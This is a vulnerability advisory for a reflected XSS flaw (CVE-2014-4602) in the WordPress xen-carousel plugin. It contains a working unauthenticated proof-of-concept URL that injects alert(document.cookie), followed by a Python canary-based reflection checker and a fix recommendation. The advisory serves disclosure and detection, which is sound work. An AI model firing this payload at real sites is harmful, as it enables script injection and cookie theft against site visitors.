wp-plugin : xen-carousel

Plugin Details
Plugin Name: wp-plugin : xen-carousel
Affected Version : 0.12.2 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://localhost/wp-content/plugins/xen-carousel/xencarousel-admin.js.php?path=path'>alert(document.cookie)&ajaxpath=ajaxpath'>alert(document.cookie)&

Vulnerable Parameter : path, ajaxpath
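The PoC above relies on the script endpoint echoing the two GET parameters back into its output without encoding, and it needs no WordPress login. A safe way to confirm the reflection on an install without firing a real payload is to send a unique canary per parameter that carries the break-out characters (a single quote, > and <) and check whether they come back intact. The following checker is an added example written for this advisory; it is not code from the plugin or from WPScan. It assumes only the endpoint path and parameter names given above; the response bodies used for the offline check are constructed for illustration, not captured from a real install.

```python
"""Reflection check for the xen-carousel path/ajaxpath XSS (CVE-2014-4602).

Added example, not the plugin's code. Assumes the endpoint and parameter
names from the advisory; everything else is illustrative.
"""
import secrets
from urllib.parse import urlencode, urljoin
from urllib.request import Request, urlopen

ENDPOINT = "wp-content/plugins/xen-carousel/xencarousel-admin.js.php"
PARAMS = ("path", "ajaxpath")
# Metacharacters an attacker needs to leave the quoted string and open a tag.
SUFFIX = "'><xc/>"


def make_canaries() -> dict:
    """One canary per parameter. Tokens differ per parameter so that the
    'path' canary is never a substring of the 'ajaxpath' canary."""
    return {p: f"{p}{secrets.token_hex(4)}{SUFFIX}" for p in PARAMS}


def build_url(base: str, canaries: dict) -> str:
    """Same shape as the advisory's PoC URL, with canaries instead of alert()."""
    return urljoin(base.rstrip("/") + "/", ENDPOINT) + "?" + urlencode(canaries)


def classify(body: str, canaries: dict) -> dict:
    """Per parameter: 'raw' if the canary is echoed with its metacharacters
    intact (vulnerable), 'encoded' if only the alphanumeric stem comes back
    (the sink escapes output), 'absent' if the parameter is not reflected."""
    result = {}
    for param, canary in canaries.items():
        stem = canary[: -len(SUFFIX)]
        if canary in body:
            result[param] = "raw"
        elif stem in body:
            result[param] = "encoded"
        else:
            result[param] = "absent"
    return result


def is_vulnerable(result: dict) -> bool:
    return any(v == "raw" for v in result.values())


def check(base: str) -> dict:
    """Fetch the endpoint unauthenticated and classify both parameters.
    Only run this against a site you are authorised to test."""
    canaries = make_canaries()
    req = Request(build_url(base, canaries),
                  headers={"User-Agent": "xen-carousel-reflection-check"})
    with urlopen(req, timeout=10) as resp:
        body = resp.read().decode("utf-8", "replace")
    return classify(body, canaries)


if __name__ == "__main__":
    # Offline demonstration on constructed responses (not real plugin output).
    demo = {"path": "path1111" + SUFFIX, "ajaxpath": "ajaxpath2222" + SUFFIX}
    unpatched = ("var path = 'path1111'><xc/>';\n"
                 "var ajaxpath = 'ajaxpath2222'><xc/>';\n")
    hardened = ("var path = 'path1111&#x27;&gt;&lt;xc/&gt;';\n"
                "var ajaxpath = 'ajaxpath2222&#x27;&gt;&lt;xc/&gt;';\n")
    print("unpatched:", classify(unpatched, demo))   # both 'raw'
    print("hardened: ", classify(hardened, demo))    # both 'encoded'
    print(build_url("http://localhost", demo))
```

A result of 'raw' for either parameter means the endpoint reproduces the quote and angle brackets verbatim, which is exactly what the PoC needs; 'encoded' means the output is being escaped and the PoC should fail. Because the endpoint serves JavaScript, a proper fix in the plugin is to emit the values with json_encode() (or to drop the user-supplied parameters entirely), not to rely on the caller.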


Disclosure Timeline
Vendor Contacted : 2014-01-17
Plugin Status : Updated on
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4602
Plugin Description :
The balance of form and function. Call out sections of your site by easily creating a carousel of images, associated to posts or pages, for display on your home page or anywhere on your site. The carousel purposely does not come styled, but is instead semantically marked up with #IDs and .classes to make it easy for you to integrate it into your theme without much effort.